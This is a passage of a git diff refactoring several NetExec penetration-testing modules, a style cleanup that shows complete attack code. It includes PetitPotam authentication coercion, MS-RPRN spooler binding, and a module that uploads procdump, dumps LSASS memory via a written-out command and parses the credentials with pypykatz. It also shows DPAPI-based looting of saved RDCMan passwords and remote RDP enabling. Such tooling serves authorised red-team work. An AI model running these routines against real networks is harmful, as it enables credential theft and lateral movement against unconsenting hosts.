# -*- coding: utf-8 -*-
|
|
||||||
# From https://github.com/topotam/PetitPotam
|
# From https://github.com/topotam/PetitPotam
|
||||||
# All credit to @topotam
|
# All credit to @topotam
|
||||||
# Module by @mpgn_x64
|
# Module by @mpgn_x64
|
||||||
|
@ -67,8 +65,8 @@ class NXCModule:
|
||||||
host.signing,
|
host.signing,
|
||||||
petitpotam=True,
|
petitpotam=True,
|
||||||
)
|
)
|
||||||
except Exception as e:
|
except Exception:
|
||||||
context.log.debug(f"Error updating petitpotam status in database")
|
context.log.debug("Error updating petitpotam status in database")
|
||||||
|
|
||||||
|
|
||||||
class DCERPCSessionError(DCERPCException):
|
class DCERPCSessionError(DCERPCException):
|
||||||
|
@ -80,13 +78,9 @@ class DCERPCSessionError(DCERPCException):
|
||||||
if key in system_errors.ERROR_MESSAGES:
|
if key in system_errors.ERROR_MESSAGES:
|
||||||
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
||||||
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
||||||
return "EFSR SessionError: code: 0x%x - %s - %s" % (
|
return f"EFSR SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
|
||||||
self.error_code,
|
|
||||||
error_msg_short,
|
|
||||||
error_msg_verbose,
|
|
||||||
)
|
|
||||||
else:
|
else:
|
||||||
return "EFSR SessionError: unknown error code: 0x%x" % self.error_code
|
return f"EFSR SessionError: unknown error code: 0x{self.error_code:x}"
|
||||||
|
|
||||||
|
|
||||||
################################################################################
|
################################################################################
|
||||||
|
@ -248,18 +242,18 @@ def coerce(
|
||||||
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
|
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
|
||||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||||
|
|
||||||
context.log.info("[-] Connecting to %s" % binding_params[pipe]["stringBinding"])
|
context.log.info(f"[-] Connecting to {binding_params[pipe]['stringBinding']}")
|
||||||
try:
|
try:
|
||||||
dce.connect()
|
dce.connect()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Something went wrong, check error status => %s" % str(e))
|
context.log.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
sys.exit()
|
sys.exit()
|
||||||
context.log.info("[+] Connected!")
|
context.log.info("[+] Connected!")
|
||||||
context.log.info("[+] Binding to %s" % binding_params[pipe]["MSRPC_UUID_EFSR"][0])
|
context.log.info(f"[+] Binding to {binding_params[pipe]['MSRPC_UUID_EFSR'][0]}")
|
||||||
try:
|
try:
|
||||||
dce.bind(uuidtup_to_bin(binding_params[pipe]["MSRPC_UUID_EFSR"]))
|
dce.bind(uuidtup_to_bin(binding_params[pipe]["MSRPC_UUID_EFSR"]))
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Something went wrong, check error status => %s" % str(e))
|
context.log.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
sys.exit()
|
sys.exit()
|
||||||
context.log.info("[+] Successfully bound!")
|
context.log.info("[+] Successfully bound!")
|
||||||
return dce
|
return dce
|
||||||
|
@ -268,9 +262,9 @@ def coerce(
|
||||||
def efs_rpc_open_file_raw(dce, listener, context=None):
|
def efs_rpc_open_file_raw(dce, listener, context=None):
|
||||||
try:
|
try:
|
||||||
request = EfsRpcOpenFileRaw()
|
request = EfsRpcOpenFileRaw()
|
||||||
request["fileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
|
request["fileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
|
||||||
request["Flag"] = 0
|
request["Flag"] = 0
|
||||||
resp = dce.request(request)
|
dce.request(request)
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("ERROR_BAD_NETPATH") >= 0:
|
if str(e).find("ERROR_BAD_NETPATH") >= 0:
|
||||||
|
@ -283,14 +277,14 @@ def efs_rpc_open_file_raw(dce, listener, context=None):
|
||||||
context.log.info("[-] Sending EfsRpcEncryptFileSrv!")
|
context.log.info("[-] Sending EfsRpcEncryptFileSrv!")
|
||||||
try:
|
try:
|
||||||
request = EfsRpcEncryptFileSrv()
|
request = EfsRpcEncryptFileSrv()
|
||||||
request["FileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
|
request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
|
||||||
resp = dce.request(request)
|
dce.request(request)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("ERROR_BAD_NETPATH") >= 0:
|
if str(e).find("ERROR_BAD_NETPATH") >= 0:
|
||||||
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
|
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
|
||||||
context.log.info("[+] Attack worked!")
|
context.log.info("[+] Attack worked!")
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
context.log.debug("Something went wrong, check error status => %s" % str(e))
|
context.log.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
else:
|
else:
|
||||||
context.log.debug("Something went wrong, check error status => %s" % str(e))
|
context.log.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
from impacket import system_errors
|
from impacket import system_errors
|
||||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
@ -35,9 +32,7 @@ class NXCModule:
|
||||||
self.port = None
|
self.port = None
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""PORT Port to check (defaults to 445)"""
|
||||||
PORT Port to check (defaults to 445)
|
|
||||||
"""
|
|
||||||
self.port = 445
|
self.port = 445
|
||||||
if "PORT" in module_options:
|
if "PORT" in module_options:
|
||||||
self.port = int(module_options["PORT"])
|
self.port = int(module_options["PORT"])
|
||||||
|
@ -46,7 +41,7 @@ class NXCModule:
|
||||||
# Connect and bind to MS-RPRN (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/848b8334-134a-4d02-aea4-03b673d6c515)
|
# Connect and bind to MS-RPRN (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/848b8334-134a-4d02-aea4-03b673d6c515)
|
||||||
stringbinding = r"ncacn_np:%s[\PIPE\spoolss]" % connection.host
|
stringbinding = r"ncacn_np:%s[\PIPE\spoolss]" % connection.host
|
||||||
|
|
||||||
context.log.info("Binding to %s" % (repr(stringbinding)))
|
context.log.info(f"Binding to {stringbinding!r}")
|
||||||
|
|
||||||
rpctransport = transport.DCERPCTransportFactory(stringbinding)
|
rpctransport = transport.DCERPCTransportFactory(stringbinding)
|
||||||
|
|
||||||
|
@ -71,7 +66,7 @@ class NXCModule:
|
||||||
# Bind to MSRPC MS-RPRN UUID: 12345678-1234-ABCD-EF00-0123456789AB
|
# Bind to MSRPC MS-RPRN UUID: 12345678-1234-ABCD-EF00-0123456789AB
|
||||||
dce.bind(rprn.MSRPC_UUID_RPRN)
|
dce.bind(rprn.MSRPC_UUID_RPRN)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Failed to bind: %s" % e)
|
context.log.fail(f"Failed to bind: {e}")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
flags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
|
flags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
|
||||||
|
@ -119,13 +114,9 @@ class DCERPCSessionError(DCERPCException):
|
||||||
if key in system_errors.ERROR_MESSAGES:
|
if key in system_errors.ERROR_MESSAGES:
|
||||||
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
||||||
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
||||||
return "RPRN SessionError: code: 0x%x - %s - %s" % (
|
return f"RPRN SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
|
||||||
self.error_code,
|
|
||||||
error_msg_short,
|
|
||||||
error_msg_verbose,
|
|
||||||
)
|
|
||||||
else:
|
else:
|
||||||
return "RPRN SessionError: unknown error code: 0x%x" % self.error_code
|
return f"RPRN SessionError: unknown error code: 0x{self.error_code:x}"
|
||||||
|
|
||||||
|
|
||||||
################################################################################
|
################################################################################
|
||||||
|
@ -191,26 +182,26 @@ class DRIVER_INFO_2_BLOB(Structure):
|
||||||
def fromString(self, data, offset=0):
|
def fromString(self, data, offset=0):
|
||||||
Structure.fromString(self, data)
|
Structure.fromString(self, data)
|
||||||
|
|
||||||
name = data[self["NameOffset"] + offset :].decode("utf-16-le")
|
name = data[self["NameOffset"] + offset:].decode("utf-16-le")
|
||||||
name_len = name.find("\0")
|
name_len = name.find("\0")
|
||||||
self["Name"] = checkNullString(name[:name_len])
|
self["Name"] = checkNullString(name[:name_len])
|
||||||
|
|
||||||
self["ConfigFile"] = data[self["ConfigFileOffset"] + offset : self["DataFileOffset"] + offset].decode("utf-16-le")
|
self["ConfigFile"] = data[self["ConfigFileOffset"] + offset: self["DataFileOffset"] + offset].decode("utf-16-le")
|
||||||
self["DataFile"] = data[self["DataFileOffset"] + offset : self["DriverPathOffset"] + offset].decode("utf-16-le")
|
self["DataFile"] = data[self["DataFileOffset"] + offset: self["DriverPathOffset"] + offset].decode("utf-16-le")
|
||||||
self["DriverPath"] = data[self["DriverPathOffset"] + offset : self["EnvironmentOffset"] + offset].decode("utf-16-le")
|
self["DriverPath"] = data[self["DriverPathOffset"] + offset: self["EnvironmentOffset"] + offset].decode("utf-16-le")
|
||||||
self["Environment"] = data[self["EnvironmentOffset"] + offset : self["NameOffset"] + offset].decode("utf-16-le")
|
self["Environment"] = data[self["EnvironmentOffset"] + offset: self["NameOffset"] + offset].decode("utf-16-le")
|
||||||
|
|
||||||
|
|
||||||
class DRIVER_INFO_2_ARRAY(Structure):
|
class DRIVER_INFO_2_ARRAY(Structure):
|
||||||
def __init__(self, data=None, pcReturned=None):
|
def __init__(self, data=None, pcReturned=None):
|
||||||
Structure.__init__(self, data=data)
|
Structure.__init__(self, data=data)
|
||||||
self["drivers"] = list()
|
self["drivers"] = []
|
||||||
remaining = data
|
remaining = data
|
||||||
if data is not None:
|
if data is not None:
|
||||||
for _ in range(pcReturned):
|
for _ in range(pcReturned):
|
||||||
attr = DRIVER_INFO_2_BLOB(remaining)
|
attr = DRIVER_INFO_2_BLOB(remaining)
|
||||||
self["drivers"].append(attr)
|
self["drivers"].append(attr)
|
||||||
remaining = remaining[len(attr) :]
|
remaining = remaining[len(attr):]
|
||||||
|
|
||||||
|
|
||||||
class DRIVER_INFO_UNION(NDRUNION):
|
class DRIVER_INFO_UNION(NDRUNION):
|
||||||
|
|
|
@ -1,7 +1,4 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# prdocdump module for nxc python3
|
# prdocdump module for nxc python3
|
||||||
# author: github.com/mpgn
|
|
||||||
# thanks to pixis (@HackAndDo) for making it pretty l33t :)
|
# thanks to pixis (@HackAndDo) for making it pretty l33t :)
|
||||||
# v0.4
|
# v0.4
|
||||||
|
|
||||||
|
@ -20,13 +17,12 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
||||||
PROCDUMP_PATH Path where procdump.exe is on your system (default: /tmp/), if changed embeded version will not be used
|
PROCDUMP_PATH Path where procdump.exe is on your system (default: /tmp/), if changed embeded version will not be used
|
||||||
PROCDUMP_EXE_NAME Name of the procdump executable (default: procdump.exe), if changed embeded version will not be used
|
PROCDUMP_EXE_NAME Name of the procdump executable (default: procdump.exe), if changed embeded version will not be used
|
||||||
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = PROCDUMP_PATH)
|
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = PROCDUMP_PATH)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.tmp_dir = "C:\\Windows\\Temp\\"
|
self.tmp_dir = "C:\\Windows\\Temp\\"
|
||||||
self.share = "C$"
|
self.share = "C$"
|
||||||
self.tmp_share = self.tmp_dir.split(":")[1]
|
self.tmp_share = self.tmp_dir.split(":")[1]
|
||||||
|
@ -53,25 +49,25 @@ class NXCModule:
|
||||||
self.dir_result = module_options["DIR_RESULT"]
|
self.dir_result = module_options["DIR_RESULT"]
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
if self.useembeded == True:
|
if self.useembeded is True:
|
||||||
with open(self.procdump_path + self.procdump, "wb") as procdump:
|
with open(self.procdump_path + self.procdump, "wb") as procdump:
|
||||||
procdump.write(self.procdump_embeded)
|
procdump.write(self.procdump_embeded)
|
||||||
|
|
||||||
context.log.display("Copy {} to {}".format(self.procdump_path + self.procdump, self.tmp_dir))
|
context.log.display(f"Copy {self.procdump_path + self.procdump} to {self.tmp_dir}")
|
||||||
with open(self.procdump_path + self.procdump, "rb") as procdump:
|
with open(self.procdump_path + self.procdump, "rb") as procdump:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read)
|
connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read)
|
||||||
context.log.success("Created file {} on the \\\\{}{}".format(self.procdump, self.share, self.tmp_share))
|
context.log.success(f"Created file {self.procdump} on the \\\\{self.share}{self.tmp_share}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"Error writing file to share {self.share}: {e}")
|
context.log.fail(f"Error writing file to share {self.share}: {e}")
|
||||||
|
|
||||||
# get pid lsass
|
# get pid lsass
|
||||||
command = 'tasklist /v /fo csv | findstr /i "lsass"'
|
command = 'tasklist /v /fo csv | findstr /i "lsass"'
|
||||||
context.log.display("Getting lsass PID {}".format(command))
|
context.log.display(f"Getting lsass PID {command}")
|
||||||
p = connection.execute(command, True)
|
p = connection.execute(command, True)
|
||||||
pid = p.split(",")[1][1:-1]
|
pid = p.split(",")[1][1:-1]
|
||||||
command = self.tmp_dir + self.procdump + " -accepteula -ma " + pid + " " + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp"
|
command = self.tmp_dir + self.procdump + " -accepteula -ma " + pid + " " + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp"
|
||||||
context.log.display("Executing command {}".format(command))
|
context.log.display(f"Executing command {command}")
|
||||||
p = connection.execute(command, True)
|
p = connection.execute(command, True)
|
||||||
context.log.debug(p)
|
context.log.debug(p)
|
||||||
dump = False
|
dump = False
|
||||||
|
@ -91,30 +87,29 @@ class NXCModule:
|
||||||
context.log.display("Error getting the lsass.dmp file name")
|
context.log.display("Error getting the lsass.dmp file name")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
context.log.display("Copy {} to host".format(machine_name))
|
context.log.display(f"Copy {machine_name} to host")
|
||||||
|
|
||||||
with open(self.dir_result + machine_name, "wb+") as dump_file:
|
with open(self.dir_result + machine_name, "wb+") as dump_file:
|
||||||
try:
|
try:
|
||||||
connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
|
connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
|
||||||
context.log.success("Dumpfile of lsass.exe was transferred to {}".format(self.dir_result + machine_name))
|
context.log.success(f"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while get file: {}".format(e))
|
context.log.fail(f"Error while get file: {e}")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
|
connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
|
||||||
context.log.success("Deleted procdump file on the {} share".format(self.share))
|
context.log.success(f"Deleted procdump file on the {self.share} share")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error deleting procdump file on share {}: {}".format(self.share, e))
|
context.log.fail(f"Error deleting procdump file on share {self.share}: {e}")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
|
connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
|
||||||
context.log.success("Deleted lsass.dmp file on the {} share".format(self.share))
|
context.log.success(f"Deleted lsass.dmp file on the {self.share} share")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error deleting lsass.dmp file on share {}: {}".format(self.share, e))
|
context.log.fail(f"Error deleting lsass.dmp file on share {self.share}: {e}")
|
||||||
|
|
||||||
with open(self.dir_result + machine_name, "rb") as dump:
|
with open(self.dir_result + machine_name, "rb") as dump:
|
||||||
try:
|
try:
|
||||||
credentials = []
|
|
||||||
credz_bh = []
|
credz_bh = []
|
||||||
try:
|
try:
|
||||||
pypy_parse = pypykatz.parse_minidump_external(dump)
|
pypy_parse = pypykatz.parse_minidump_external(dump)
|
||||||
|
|
|
@ -23,7 +23,7 @@ class NXCModule:
|
||||||
self.module_options = module_options
|
self.module_options = module_options
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
""" """
|
"""No options available."""
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from dploot.triage.rdg import RDGTriage
|
from dploot.triage.rdg import RDGTriage
|
||||||
from dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file
|
from dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file
|
||||||
from dploot.triage.backupkey import BackupkeyTriage
|
from dploot.triage.backupkey import BackupkeyTriage
|
||||||
|
@ -26,11 +23,11 @@ class NXCModule:
|
||||||
self.masterkeys = None
|
self.masterkeys = None
|
||||||
|
|
||||||
if "PVK" in module_options:
|
if "PVK" in module_options:
|
||||||
self.pvkbytes = open(module_options["PVK"], "rb").read()
|
self.pvkbytes = open(module_options["PVK"], "rb").read() # noqa: SIM115
|
||||||
|
|
||||||
if "MKFILE" in module_options:
|
if "MKFILE" in module_options:
|
||||||
self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
|
self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
|
||||||
self.pvkbytes = open(module_options["MKFILE"], "rb").read()
|
self.pvkbytes = open(module_options["MKFILE"], "rb").read() # noqa: SIM115
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
host = connection.hostname + "." + connection.domain
|
host = connection.hostname + "." + connection.domain
|
||||||
|
@ -67,8 +64,7 @@ class NXCModule:
|
||||||
backupkey = backupkey_triage.triage_backupkey()
|
backupkey = backupkey_triage.triage_backupkey()
|
||||||
self.pvkbytes = backupkey.backupkey_v2
|
self.pvkbytes = backupkey.backupkey_v2
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Could not get domain backupkey: {}".format(e))
|
context.log.debug(f"Could not get domain backupkey: {e}")
|
||||||
pass
|
|
||||||
|
|
||||||
target = Target.create(
|
target = Target.create(
|
||||||
domain=domain,
|
domain=domain,
|
||||||
|
@ -89,7 +85,7 @@ class NXCModule:
|
||||||
conn = DPLootSMBConnection(target)
|
conn = DPLootSMBConnection(target)
|
||||||
conn.smb_session = connection.conn
|
conn.smb_session = connection.conn
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Could not upgrade connection: {}".format(e))
|
context.log.debug(f"Could not upgrade connection: {e}")
|
||||||
return
|
return
|
||||||
|
|
||||||
plaintexts = {username: password for _, _, username, password, _, _ in context.db.get_credentials(cred_type="plaintext")}
|
plaintexts = {username: password for _, _, username, password, _, _ in context.db.get_credentials(cred_type="plaintext")}
|
||||||
|
@ -110,13 +106,13 @@ class NXCModule:
|
||||||
)
|
)
|
||||||
self.masterkeys = masterkeys_triage.triage_masterkeys()
|
self.masterkeys = masterkeys_triage.triage_masterkeys()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Could not get masterkeys: {}".format(e))
|
context.log.debug(f"Could not get masterkeys: {e}")
|
||||||
|
|
||||||
if len(self.masterkeys) == 0:
|
if len(self.masterkeys) == 0:
|
||||||
context.log.fail("No masterkeys looted")
|
context.log.fail("No masterkeys looted")
|
||||||
return
|
return
|
||||||
|
|
||||||
context.log.success("Got {} decrypted masterkeys. Looting RDCMan secrets".format(highlight(len(self.masterkeys))))
|
context.log.success(f"Got {highlight(len(self.masterkeys))} decrypted masterkeys. Looting RDCMan secrets")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
triage = RDGTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
triage = RDGTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
||||||
|
@ -125,71 +121,17 @@ class NXCModule:
|
||||||
if rdcman_file is None:
|
if rdcman_file is None:
|
||||||
continue
|
continue
|
||||||
for rdg_cred in rdcman_file.rdg_creds:
|
for rdg_cred in rdcman_file.rdg_creds:
|
||||||
if rdg_cred.type == "cred":
|
if rdg_cred.type in ["cred", "logon", "server"]:
|
||||||
context.log.highlight(
|
log_text = "{} - {}:{}".format(rdg_cred.server_name, rdg_cred.username, rdg_cred.password.decode("latin-1")) if rdg_cred.type == "server" else "{}:{}".format(rdg_cred.username, rdg_cred.password.decode("latin-1"))
|
||||||
"[%s][%s] %s:%s"
|
context.log.highlight(f"[{rdcman_file.winuser}][{rdg_cred.profile_name}] {log_text}")
|
||||||
% (
|
|
||||||
rdcman_file.winuser,
|
|
||||||
rdg_cred.profile_name,
|
|
||||||
rdg_cred.username,
|
|
||||||
rdg_cred.password.decode("latin-1"),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
elif rdg_cred.type == "logon":
|
|
||||||
context.log.highlight(
|
|
||||||
"[%s][%s] %s:%s"
|
|
||||||
% (
|
|
||||||
rdcman_file.winuser,
|
|
||||||
rdg_cred.profile_name,
|
|
||||||
rdg_cred.username,
|
|
||||||
rdg_cred.password.decode("latin-1"),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
elif rdg_cred.type == "server":
|
|
||||||
context.log.highlight(
|
|
||||||
"[%s][%s] %s - %s:%s"
|
|
||||||
% (
|
|
||||||
rdcman_file.winuser,
|
|
||||||
rdg_cred.profile_name,
|
|
||||||
rdg_cred.server_name,
|
|
||||||
rdg_cred.username,
|
|
||||||
rdg_cred.password.decode("latin-1"),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
for rdgfile in rdgfiles:
|
for rdgfile in rdgfiles:
|
||||||
if rdgfile is None:
|
if rdgfile is None:
|
||||||
continue
|
continue
|
||||||
for rdg_cred in rdgfile.rdg_creds:
|
for rdg_cred in rdgfile.rdg_creds:
|
||||||
if rdg_cred.type == "cred":
|
log_text = "{}:{}".format(rdg_cred.username, rdg_cred.password.decode("latin-1"))
|
||||||
context.log.highlight(
|
if rdg_cred.type == "server":
|
||||||
"[%s][%s] %s:%s"
|
log_text = f"{rdg_cred.server_name} - {log_text}"
|
||||||
% (
|
context.log.highlight(f"[{rdgfile.winuser}][{rdg_cred.profile_name}] {log_text}")
|
||||||
rdgfile.winuser,
|
|
||||||
rdg_cred.profile_name,
|
|
||||||
rdg_cred.username,
|
|
||||||
rdg_cred.password.decode("latin-1"),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
elif rdg_cred.type == "logon":
|
|
||||||
context.log.highlight(
|
|
||||||
"[%s][%s] %s:%s"
|
|
||||||
% (
|
|
||||||
rdgfile.winuser,
|
|
||||||
rdg_cred.profile_name,
|
|
||||||
rdg_cred.username,
|
|
||||||
rdg_cred.password.decode("latin-1"),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
elif rdg_cred.type == "server":
|
|
||||||
context.log.highlight(
|
|
||||||
"[%s][%s] %s - %s:%s"
|
|
||||||
% (
|
|
||||||
rdgfile.winuser,
|
|
||||||
rdg_cred.profile_name,
|
|
||||||
rdg_cred.server_name,
|
|
||||||
rdg_cred.username,
|
|
||||||
rdg_cred.password.decode("latin-1"),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Could not loot RDCMan secrets: {}".format(e))
|
context.log.debug(f"Could not loot RDCMan secrets: {e}")
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
|
||||||
from nxc.connection import dcom_FirewallChecker
|
from nxc.connection import dcom_FirewallChecker
|
||||||
|
@ -11,12 +8,13 @@ from impacket.dcerpc.v5.dcomrt import DCOMConnection
|
||||||
from impacket.dcerpc.v5.dcom import wmi
|
from impacket.dcerpc.v5.dcom import wmi
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||||
|
import contextlib
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
name = "rdp"
|
name = "rdp"
|
||||||
description = "Enables/Disables RDP"
|
description = "Enables/Disables RDP"
|
||||||
supported_protocols = ["smb" ,"wmi"]
|
supported_protocols = ["smb", "wmi"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
|
@ -35,7 +33,7 @@ class NXCModule:
|
||||||
nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
|
nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
|
||||||
nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
|
nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
|
||||||
"""
|
"""
|
||||||
if not "ACTION" in module_options:
|
if "ACTION" not in module_options:
|
||||||
context.log.fail("ACTION option not specified!")
|
context.log.fail("ACTION option not specified!")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
|
@ -44,26 +42,26 @@ class NXCModule:
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
self.action = module_options["ACTION"].lower()
|
self.action = module_options["ACTION"].lower()
|
||||||
|
|
||||||
if not "METHOD" in module_options:
|
if "METHOD" not in module_options:
|
||||||
self.method = "wmi"
|
self.method = "wmi"
|
||||||
else:
|
else:
|
||||||
self.method = module_options['METHOD'].lower()
|
self.method = module_options["METHOD"].lower()
|
||||||
|
|
||||||
if context.protocol != "smb" and self.method == "smb":
|
if context.protocol != "smb" and self.method == "smb":
|
||||||
context.log.fail(f"Protocol: {context.protocol} not support this method")
|
context.log.fail(f"Protocol: {context.protocol} not support this method")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
if not "DCOM-TIMEOUT" in module_options:
|
if "DCOM-TIMEOUT" not in module_options:
|
||||||
self.dcom_timeout = 10
|
self.dcom_timeout = 10
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
self.dcom_timeout = int(module_options['DCOM-TIMEOUT'])
|
self.dcom_timeout = int(module_options["DCOM-TIMEOUT"])
|
||||||
except:
|
except Exception:
|
||||||
context.log.fail("Wrong DCOM timeout value!")
|
context.log.fail("Wrong DCOM timeout value!")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
if not "OLD" in module_options:
|
if "OLD" not in module_options:
|
||||||
self.oldSystem = False
|
self.oldSystem = False
|
||||||
else:
|
else:
|
||||||
self.oldSystem = True
|
self.oldSystem = True
|
||||||
|
@ -73,136 +71,131 @@ class NXCModule:
|
||||||
if self.method == "smb":
|
if self.method == "smb":
|
||||||
context.log.info("Executing over SMB(ncacn_np)")
|
context.log.info("Executing over SMB(ncacn_np)")
|
||||||
try:
|
try:
|
||||||
smb_rdp = rdp_SMB(context, connection)
|
smb_rdp = RdpSmb(context, connection)
|
||||||
if "ram" in self.action:
|
if "ram" in self.action:
|
||||||
smb_rdp.rdp_RAMWrapper(self.action)
|
smb_rdp.rdp_ram_wrapper(self.action)
|
||||||
else:
|
else:
|
||||||
smb_rdp.rdp_Wrapper(self.action)
|
smb_rdp.rdp_wrapper(self.action)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
